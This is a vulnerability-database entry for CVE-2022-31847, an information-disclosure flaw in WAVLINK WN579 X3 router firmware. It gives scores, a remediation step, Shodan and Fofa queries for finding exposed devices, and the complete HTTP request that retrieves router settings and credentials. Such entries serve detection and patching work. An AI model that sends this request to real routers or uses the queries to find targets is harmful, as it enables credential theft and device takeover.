🔙 목록으로 돌아가기

CVE-2022-31847: WAVLINK WN579 X3 M79X3.V5030.180719 - Information Disclosure

TitleWAVLINK WN579 X3 M79X3.V5030.180719 - Information Disclosure
Authorarafatansari
SeverityHigh
ImpactAn attacker can exploit this vulnerability to gain access to sensitive information, such as router configuration settings and user credentials.
RemediationApply the latest firmware update provided by the vendor to fix the information disclosure vulnerability.
CVSS Score7.5
EPSS Score0.58442
CVE IDCVE-2022-31847
CWE IDCWE-425
Shodan Queryhttp.html:"Wavlink"http.html:"wavlink"
Fofa Querybody="wavlink"
Tags cve cve2022 wavlink exposure vkev vuln

🔍 Vulnerability Description

WAVLINK WN579 X3 M79X3.V5030.180719 is susceptible to information disclosure in /cgi-bin/ExportAllSettings.sh. An attacker can obtain sensitive router information via a crafted POST request and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations.

🌐 HTTP Request

GET /cgi-bin/ExportAllSettings.sh HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; PPC Mac OS X 10_8_9 rv:6.0; ms-MY) AppleWebKit/532.11.2 (KHTML, like Gecko) Version/5.0 Safari/532.11.2
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-31847.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-31847.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A